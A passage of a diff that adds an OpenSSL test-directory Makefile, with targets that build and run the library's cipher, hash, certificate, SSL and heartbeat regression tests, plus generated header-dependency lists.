+$(SRC):
+	@sh $(TOP)/util/point.sh dummytest.c $@
+
+errors:
+
+install:
+
+tags:
+	ctags $(SRC)
+
+tests:	exe apps $(TESTS)
+
+apps:
+	@(cd ..; $(MAKE) DIRS=apps all)
+
+alltests: \
+	test_des test_idea test_sha test_md4 test_md5 test_hmac \
+	test_md2 test_mdc2 test_wp \
+	test_rmd test_rc2 test_rc4 test_rc5 test_bf test_cast test_aes \
+	test_rand test_bn test_ec test_ecdsa test_ecdh \
+	test_enc test_x509 test_rsa test_crl test_sid \
+	test_gen test_req test_pkcs7 test_verify test_dh test_dsa \
+	test_ss test_ca test_engine test_evp test_ssl test_tsa test_ige \
+	test_jpake test_srp test_cms test_ocsp test_v3name test_heartbeat \
+	test_constant_time
+
+test_evp: $(EVPTEST)$(EXE_EXT) evptests.txt
+	../util/shlib_wrap.sh ./$(EVPTEST) evptests.txt
+
+test_des: $(DESTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(DESTEST)
+
+test_idea: $(IDEATEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(IDEATEST)
+
+test_sha: $(SHATEST)$(EXE_EXT) $(SHA1TEST)$(EXE_EXT) $(SHA256TEST)$(EXE_EXT) $(SHA512TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(SHATEST)
+	../util/shlib_wrap.sh ./$(SHA1TEST)
+	../util/shlib_wrap.sh ./$(SHA256TEST)
+	../util/shlib_wrap.sh ./$(SHA512TEST)
+
+test_mdc2: $(MDC2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MDC2TEST)
+
+test_md5: $(MD5TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD5TEST)
+
+test_md4: $(MD4TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD4TEST)
+
+test_hmac: $(HMACTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(HMACTEST)
+
+test_wp: $(WPTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(WPTEST)
+
+test_md2: $(MD2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD2TEST)
+
+test_rmd: $(RMDTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RMDTEST)
+
+test_bf: $(BFTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(BFTEST)
+
+test_cast: $(CASTTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(CASTTEST)
+
+test_rc2: $(RC2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC2TEST)
+
+test_rc4: $(RC4TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC4TEST)
+
+test_rc5: $(RC5TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC5TEST)
+
+test_rand: $(RANDTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RANDTEST)
+
+test_enc: ../apps/openssl$(EXE_EXT) testenc
+	@sh ./testenc
+
+test_x509: ../apps/openssl$(EXE_EXT) tx509 testx509.pem v3-cert1.pem v3-cert2.pem
+	echo test normal x509v1 certificate
+	sh ./tx509 2>/dev/null
+	echo test first x509v3 certificate
+	sh ./tx509 v3-cert1.pem 2>/dev/null
+	echo test second x509v3 certificate
+	sh ./tx509 v3-cert2.pem 2>/dev/null
+
+test_rsa: $(RSATEST)$(EXE_EXT) ../apps/openssl$(EXE_EXT) trsa testrsa.pem
+	@sh ./trsa 2>/dev/null
+	../util/shlib_wrap.sh ./$(RSATEST)
+
+test_crl: ../apps/openssl$(EXE_EXT) tcrl testcrl.pem
+	@sh ./tcrl 2>/dev/null
+
+test_sid: ../apps/openssl$(EXE_EXT) tsid testsid.pem
+	@sh ./tsid 2>/dev/null
+
+test_req: ../apps/openssl$(EXE_EXT) treq testreq.pem testreq2.pem
+	@sh ./treq 2>/dev/null
+	@sh ./treq testreq2.pem 2>/dev/null
+
+test_pkcs7: ../apps/openssl$(EXE_EXT) tpkcs7 tpkcs7d testp7.pem pkcs7-1.pem
+	@sh ./tpkcs7 2>/dev/null
+	@sh ./tpkcs7d 2>/dev/null
+
+test_bn: $(BNTEST)$(EXE_EXT) $(EXPTEST)$(EXE_EXT) bctest
+	@echo starting big number library test, could take a while...
+	@../util/shlib_wrap.sh ./$(BNTEST) >tmp.bntest
+	@echo quit >>tmp.bntest
+	@echo "running bc"
+	@<tmp.bntest sh -c "`sh ./bctest ignore`" | $(PERL) -e '$$i=0; while (<STDIN>) {if (/^test (.*)/) {print STDERR "\nverify $$1";} elsif (!/^0$$/) {die "\nFailed! bc: $$_";} else {print STDERR "."; $$i++;}} print STDERR "\n$$i tests passed\n"'
+	@echo 'test a^b%c implementations'
+	../util/shlib_wrap.sh ./$(EXPTEST)
+
+test_ec: $(ECTEST)$(EXE_EXT)
+	@echo 'test elliptic curves'
+	../util/shlib_wrap.sh ./$(ECTEST)
+
+test_ecdsa: $(ECDSATEST)$(EXE_EXT)
+	@echo 'test ecdsa'
+	../util/shlib_wrap.sh ./$(ECDSATEST)
+
+test_ecdh: $(ECDHTEST)$(EXE_EXT)
+	@echo 'test ecdh'
+	../util/shlib_wrap.sh ./$(ECDHTEST)
+
+test_verify: ../apps/openssl$(EXE_EXT)
+	@echo "The following command should have some OK's and some failures"
+	@echo "There are definitly a few expired certificates"
+	../util/shlib_wrap.sh ../apps/openssl verify -CApath ../certs/demo ../certs/demo/*.pem
+
+test_dh: $(DHTEST)$(EXE_EXT)
+	@echo "Generate a set of DH parameters"
+	../util/shlib_wrap.sh ./$(DHTEST)
+
+test_dsa: $(DSATEST)$(EXE_EXT)
+	@echo "Generate a set of DSA parameters"
+	../util/shlib_wrap.sh ./$(DSATEST)
+	../util/shlib_wrap.sh ./$(DSATEST) -app2_1
+
+test_gen testreq.pem: ../apps/openssl$(EXE_EXT) testgen test.cnf
+	@echo "Generate and verify a certificate request"
+	@sh ./testgen
+
+test_ss keyU.ss certU.ss certCA.ss certP1.ss keyP1.ss certP2.ss keyP2.ss \
+		intP1.ss intP2.ss: testss CAss.cnf Uss.cnf P1ss.cnf P2ss.cnf \
+                                   ../apps/openssl$(EXE_EXT)
+	@echo "Generate and certify a test certificate"
+	@sh ./testss
+	@cat certCA.ss certU.ss > intP1.ss
+	@cat certCA.ss certU.ss certP1.ss > intP2.ss
+
+test_engine:  $(ENGINETEST)$(EXE_EXT)
+	@echo "Manipulate the ENGINE structures"
+	../util/shlib_wrap.sh ./$(ENGINETEST)
+
+test_ssl: keyU.ss certU.ss certCA.ss certP1.ss keyP1.ss certP2.ss keyP2.ss \
+		intP1.ss intP2.ss $(SSLTEST)$(EXE_EXT) testssl testsslproxy \
+		../apps/server2.pem serverinfo.pem
+	@echo "test SSL protocol"
+	@if [ -n "$(FIPSCANLIB)" ]; then \
+	  sh ./testfipsssl keyU.ss certU.ss certCA.ss; \
+	fi
+	../util/shlib_wrap.sh ./$(SSLTEST) -test_cipherlist
+	@sh ./testssl keyU.ss certU.ss certCA.ss
+	@sh ./testsslproxy keyP1.ss certP1.ss intP1.ss
+	@sh ./testsslproxy keyP2.ss certP2.ss intP2.ss
+
+test_ca: ../apps/openssl$(EXE_EXT) testca CAss.cnf Uss.cnf
+	@if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then \
+	  echo "skipping CA.sh test -- requires RSA"; \
+	else \
+	  echo "Generate and certify a test certificate via the 'ca' program"; \
+	  sh ./testca; \
+	fi
+
+test_aes: #$(AESTEST)
+#	@echo "test Rijndael"
+#	../util/shlib_wrap.sh ./$(AESTEST)
+
+test_tsa: ../apps/openssl$(EXE_EXT) testtsa CAtsa.cnf ../util/shlib_wrap.sh
+	@if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then \
+	  echo "skipping testtsa test -- requires RSA"; \
+	else \
+	  sh ./testtsa; \
+	fi
+
+test_ige: $(IGETEST)$(EXE_EXT)
+	@echo "Test IGE mode"
+	../util/shlib_wrap.sh ./$(IGETEST)
+
+test_jpake: $(JPAKETEST)$(EXE_EXT)
+	@echo "Test JPAKE"
+	../util/shlib_wrap.sh ./$(JPAKETEST)
+
+test_cms: ../apps/openssl$(EXE_EXT) cms-test.pl smcont.txt
+	@echo "CMS consistency test"
+	$(PERL) cms-test.pl
+
+test_srp: $(SRPTEST)$(EXE_EXT)
+	@echo "Test SRP"
+	../util/shlib_wrap.sh ./srptest
+
+test_ocsp: ../apps/openssl$(EXE_EXT) tocsp
+	@echo "Test OCSP"
+	@sh ./tocsp
+
+test_v3name: $(V3NAMETEST)$(EXE_EXT)
+	@echo "Test X509v3_check_*"
+	../util/shlib_wrap.sh ./$(V3NAMETEST)
+
+test_heartbeat: $(HEARTBEATTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(HEARTBEATTEST)
+
+test_constant_time: $(CONSTTIMETEST)$(EXE_EXT)
+	@echo "Test constant time utilites"
+	../util/shlib_wrap.sh ./$(CONSTTIMETEST)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(SRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f $(SRC) $(SHA256TEST).c $(SHA512TEST).c evptests.txt newkey.pem testkey.pem \
+			testreq.pem
+
+clean:
+	rm -f .rnd tmp.bntest tmp.bctest *.o *.obj *.dll lib tags core .pure .nfs* *.old *.bak fluff $(EXE) *.ss *.srl log dummytest
+
+$(DLIBSSL):
+	(cd ..; $(MAKE) DIRS=ssl all)
+
+$(DLIBCRYPTO):
+	(cd ..; $(MAKE) DIRS=crypto all)
+
+BUILD_CMD=shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBCRYPTO) $(LIBKRB5)"; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		CC="$${CC}" APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+FIPS_BUILD_CMD=shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBCRYPTO) $(LIBKRB5)"; \
+	if [ -z "$(SHARED_LIBS)" -a -n "$(FIPSCANLIB)" ] ; then \
+		FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; export CC FIPSLD_CC; \
+	fi; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		CC="$${CC}" APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+BUILD_CMD_STATIC=shlib_target=; \
+	LIBRARIES="$(DLIBSSL) $(DLIBCRYPTO) $(LIBKRB5)"; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+$(RSATEST)$(EXE_EXT): $(RSATEST).o $(DLIBCRYPTO)
+	@target=$(RSATEST); $(BUILD_CMD)
+
+$(BNTEST)$(EXE_EXT): $(BNTEST).o $(DLIBCRYPTO)
+	@target=$(BNTEST); $(BUILD_CMD)
+
+$(ECTEST)$(EXE_EXT): $(ECTEST).o $(DLIBCRYPTO)
+	@target=$(ECTEST); $(BUILD_CMD)
+
+$(EXPTEST)$(EXE_EXT): $(EXPTEST).o $(DLIBCRYPTO)
+	@target=$(EXPTEST); $(BUILD_CMD)
+
+$(IDEATEST)$(EXE_EXT): $(IDEATEST).o $(DLIBCRYPTO)
+	@target=$(IDEATEST); $(BUILD_CMD)
+
+$(MD2TEST)$(EXE_EXT): $(MD2TEST).o $(DLIBCRYPTO)
+	@target=$(MD2TEST); $(BUILD_CMD)
+
+$(SHATEST)$(EXE_EXT): $(SHATEST).o $(DLIBCRYPTO)
+	@target=$(SHATEST); $(BUILD_CMD)
+
+$(SHA1TEST)$(EXE_EXT): $(SHA1TEST).o $(DLIBCRYPTO)
+	@target=$(SHA1TEST); $(BUILD_CMD)
+
+$(SHA256TEST)$(EXE_EXT): $(SHA256TEST).o $(DLIBCRYPTO)
+	@target=$(SHA256TEST); $(BUILD_CMD)
+
+$(SHA512TEST)$(EXE_EXT): $(SHA512TEST).o $(DLIBCRYPTO)
+	@target=$(SHA512TEST); $(BUILD_CMD)
+
+$(RMDTEST)$(EXE_EXT): $(RMDTEST).o $(DLIBCRYPTO)
+	@target=$(RMDTEST); $(BUILD_CMD)
+
+$(MDC2TEST)$(EXE_EXT): $(MDC2TEST).o $(DLIBCRYPTO)
+	@target=$(MDC2TEST); $(BUILD_CMD)
+
+$(MD4TEST)$(EXE_EXT): $(MD4TEST).o $(DLIBCRYPTO)
+	@target=$(MD4TEST); $(BUILD_CMD)
+
+$(MD5TEST)$(EXE_EXT): $(MD5TEST).o $(DLIBCRYPTO)
+	@target=$(MD5TEST); $(BUILD_CMD)
+
+$(HMACTEST)$(EXE_EXT): $(HMACTEST).o $(DLIBCRYPTO)
+	@target=$(HMACTEST); $(BUILD_CMD)
+
+$(WPTEST)$(EXE_EXT): $(WPTEST).o $(DLIBCRYPTO)
+	@target=$(WPTEST); $(BUILD_CMD)
+
+$(RC2TEST)$(EXE_EXT): $(RC2TEST).o $(DLIBCRYPTO)
+	@target=$(RC2TEST); $(BUILD_CMD)
+
+$(BFTEST)$(EXE_EXT): $(BFTEST).o $(DLIBCRYPTO)
+	@target=$(BFTEST); $(BUILD_CMD)
+
+$(CASTTEST)$(EXE_EXT): $(CASTTEST).o $(DLIBCRYPTO)
+	@target=$(CASTTEST); $(BUILD_CMD)
+
+$(RC4TEST)$(EXE_EXT): $(RC4TEST).o $(DLIBCRYPTO)
+	@target=$(RC4TEST); $(BUILD_CMD)
+
+$(RC5TEST)$(EXE_EXT): $(RC5TEST).o $(DLIBCRYPTO)
+	@target=$(RC5TEST); $(BUILD_CMD)
+
+$(DESTEST)$(EXE_EXT): $(DESTEST).o $(DLIBCRYPTO)
+	@target=$(DESTEST); $(BUILD_CMD)
+
+$(RANDTEST)$(EXE_EXT): $(RANDTEST).o $(DLIBCRYPTO)
+	@target=$(RANDTEST); $(BUILD_CMD)
+
+$(DHTEST)$(EXE_EXT): $(DHTEST).o $(DLIBCRYPTO)
+	@target=$(DHTEST); $(BUILD_CMD)
+
+$(DSATEST)$(EXE_EXT): $(DSATEST).o $(DLIBCRYPTO)
+	@target=$(DSATEST); $(BUILD_CMD)
+
+$(METHTEST)$(EXE_EXT): $(METHTEST).o $(DLIBCRYPTO)
+	@target=$(METHTEST); $(BUILD_CMD)
+
+$(SSLTEST)$(EXE_EXT): $(SSLTEST).o $(DLIBSSL) $(DLIBCRYPTO)
+	@target=$(SSLTEST); $(FIPS_BUILD_CMD)
+
+$(ENGINETEST)$(EXE_EXT): $(ENGINETEST).o $(DLIBCRYPTO)
+	@target=$(ENGINETEST); $(BUILD_CMD)
+
+$(EVPTEST)$(EXE_EXT): $(EVPTEST).o $(DLIBCRYPTO)
+	@target=$(EVPTEST); $(BUILD_CMD)
+
+$(ECDSATEST)$(EXE_EXT): $(ECDSATEST).o $(DLIBCRYPTO)
+	@target=$(ECDSATEST); $(BUILD_CMD)
+
+$(ECDHTEST)$(EXE_EXT): $(ECDHTEST).o $(DLIBCRYPTO)
+	@target=$(ECDHTEST); $(BUILD_CMD)
+
+$(IGETEST)$(EXE_EXT): $(IGETEST).o $(DLIBCRYPTO)
+	@target=$(IGETEST); $(BUILD_CMD)
+
+$(JPAKETEST)$(EXE_EXT): $(JPAKETEST).o $(DLIBCRYPTO)
+	@target=$(JPAKETEST); $(BUILD_CMD)
+
+$(ASN1TEST)$(EXE_EXT): $(ASN1TEST).o $(DLIBCRYPTO)
+	@target=$(ASN1TEST); $(BUILD_CMD)
+
+$(SRPTEST)$(EXE_EXT): $(SRPTEST).o $(DLIBCRYPTO)
+	@target=$(SRPTEST); $(BUILD_CMD)
+
+$(V3NAMETEST)$(EXE_EXT): $(V3NAMETEST).o $(DLIBCRYPTO)
+	@target=$(V3NAMETEST); $(BUILD_CMD)
+
+$(HEARTBEATTEST)$(EXE_EXT): $(HEARTBEATTEST).o $(DLIBCRYPTO)
+	@target=$(HEARTBEATTEST); $(BUILD_CMD_STATIC)
+
+$(CONSTTIMETEST)$(EXE_EXT): $(CONSTTIMETEST).o
+	@target=$(CONSTTIMETEST) $(BUILD_CMD)
+
+#$(AESTEST).o: $(AESTEST).c
+#	$(CC) -c $(CFLAGS) -DINTERMEDIATE_VALUE_KAT -DTRACE_KAT_MCT $(AESTEST).c
+
+#$(AESTEST)$(EXE_EXT): $(AESTEST).o $(DLIBCRYPTO)
+#	if [ "$(SHLIB_TARGET)" = "hpux-shared" -o "$(SHLIB_TARGET)" = "darwin-shared" ] ; then \
+#	  $(CC) -o $(AESTEST)$(EXE_EXT) $(CFLAGS) $(AESTEST).o $(PEX_LIBS) $(DLIBCRYPTO) $(EX_LIBS) ; \
+#	else \
+#	  $(CC) -o $(AESTEST)$(EXE_EXT) $(CFLAGS) $(AESTEST).o $(PEX_LIBS) $(LIBCRYPTO) $(EX_LIBS) ; \
+#	fi
+
+dummytest$(EXE_EXT): dummytest.o $(DLIBCRYPTO)
+	@target=dummytest; $(BUILD_CMD)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+asn1test.o: ../include/openssl/asn1.h ../include/openssl/asn1_mac.h
+asn1test.o: ../include/openssl/bio.h ../include/openssl/bn.h
+asn1test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+asn1test.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+asn1test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+asn1test.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+asn1test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+asn1test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+asn1test.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+asn1test.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+asn1test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+asn1test.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h asn1test.c
+bftest.o: ../e_os.h ../include/openssl/blowfish.h ../include/openssl/e_os2.h
+bftest.o: ../include/openssl/opensslconf.h bftest.c
+bntest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+bntest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+bntest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+bntest.o: ../include/openssl/dsa.h ../include/openssl/e_os2.h
+bntest.o: ../include/openssl/err.h ../include/openssl/evp.h
+bntest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+bntest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+bntest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+bntest.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+bntest.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+bntest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+bntest.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+bntest.o: ../include/openssl/x509_vfy.h bntest.c
+casttest.o: ../e_os.h ../include/openssl/cast.h ../include/openssl/e_os2.h
+casttest.o: ../include/openssl/opensslconf.h casttest.c
+constant_time_test.o: ../crypto/constant_time_locl.h ../e_os.h
+constant_time_test.o: ../include/openssl/e_os2.h
+constant_time_test.o: ../include/openssl/opensslconf.h constant_time_test.c
+destest.o: ../include/openssl/crypto.h ../include/openssl/des.h
+destest.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+destest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+destest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+destest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+destest.o: ../include/openssl/ui.h ../include/openssl/ui_compat.h destest.c
+dhtest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+dhtest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+dhtest.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dhtest.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+dhtest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dhtest.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+dhtest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h dhtest.c
+dsatest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+dsatest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+dsatest.o: ../include/openssl/dsa.h ../include/openssl/e_os2.h
+dsatest.o: ../include/openssl/err.h ../include/openssl/lhash.h
+dsatest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+dsatest.o: ../include/openssl/ossl_typ.h ../include/openssl/rand.h
+dsatest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+dsatest.o: ../include/openssl/symhacks.h dsatest.c
+ecdhtest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ecdhtest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+ecdhtest.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ecdhtest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ecdhtest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ecdhtest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ecdhtest.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+ecdhtest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ecdhtest.o: ../include/openssl/symhacks.h ecdhtest.c
+ecdsatest.o: ../include/openssl/opensslconf.h ecdsatest.c
+ectest.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+ectest.o: ectest.c
+enginetest.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+enginetest.o: enginetest.c
+evp_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+evp_test.o: ../include/openssl/bn.h ../include/openssl/conf.h
+evp_test.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+evp_test.o: ../include/openssl/err.h ../include/openssl/evp.h
+evp_test.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+evp_test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+evp_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+evp_test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+evp_test.o: ../include/openssl/symhacks.h evp_test.c
+exptest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+exptest.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+exptest.o: ../include/openssl/err.h ../include/openssl/lhash.h
+exptest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+exptest.o: ../include/openssl/ossl_typ.h ../include/openssl/rand.h
+exptest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+exptest.o: ../include/openssl/symhacks.h exptest.c
+heartbeat_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+heartbeat_test.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+heartbeat_test.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+heartbeat_test.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+heartbeat_test.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+heartbeat_test.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+heartbeat_test.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+heartbeat_test.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+heartbeat_test.o: ../include/openssl/opensslconf.h
+heartbeat_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+heartbeat_test.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+heartbeat_test.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+heartbeat_test.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+heartbeat_test.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+heartbeat_test.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+heartbeat_test.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+heartbeat_test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+heartbeat_test.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+heartbeat_test.o: ../include/openssl/x509_vfy.h ../ssl/ssl_locl.h
+heartbeat_test.o: ../test/testutil.h heartbeat_test.c
+hmactest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+hmactest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+hmactest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+hmactest.o: ../include/openssl/hmac.h ../include/openssl/md5.h
+hmactest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+hmactest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+hmactest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+hmactest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h hmactest.c
+ideatest.o: ../e_os.h ../include/openssl/e_os2.h
+ideatest.o: ../include/openssl/opensslconf.h ideatest.c
+igetest.o: ../include/openssl/aes.h ../include/openssl/e_os2.h
+igetest.o: ../include/openssl/opensslconf.h ../include/openssl/ossl_typ.h
+igetest.o: ../include/openssl/rand.h igetest.c
+jpaketest.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+jpaketest.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+jpaketest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+jpaketest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+jpaketest.o: ../include/openssl/symhacks.h jpaketest.c
+md2test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+md2test.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+md2test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md2test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md2test.o: ../include/openssl/symhacks.h md2test.c
+md4test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+md4test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+md4test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+md4test.o: ../include/openssl/md4.h ../include/openssl/obj_mac.h
+md4test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+md4test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md4test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md4test.o: ../include/openssl/symhacks.h md4test.c
+md5test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+md5test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+md5test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+md5test.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+md5test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+md5test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md5test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md5test.o: ../include/openssl/symhacks.h md5test.c
+mdc2test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+mdc2test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+mdc2test.o: ../include/openssl/des.h ../include/openssl/des_old.h
+mdc2test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+mdc2test.o: ../include/openssl/mdc2.h ../include/openssl/obj_mac.h
+mdc2test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+mdc2test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+mdc2test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+mdc2test.o: ../include/openssl/symhacks.h ../include/openssl/ui.h
+mdc2test.o: ../include/openssl/ui_compat.h mdc2test.c
+randtest.o: ../e_os.h ../include/openssl/e_os2.h
+randtest.o: ../include/openssl/opensslconf.h ../include/openssl/ossl_typ.h
+randtest.o: ../include/openssl/rand.h randtest.c
+rc2test.o: ../e_os.h ../include/openssl/e_os2.h
+rc2test.o: ../include/openssl/opensslconf.h ../include/openssl/rc2.h rc2test.c
+rc4test.o: ../e_os.h ../include/openssl/e_os2.h
+rc4test.o: ../include/openssl/opensslconf.h ../include/openssl/rc4.h
+rc4test.o: ../include/openssl/sha.h rc4test.c
+rc5test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+rc5test.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+rc5test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rc5test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rc5test.o: ../include/openssl/symhacks.h rc5test.c
+rmdtest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rmdtest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+rmdtest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
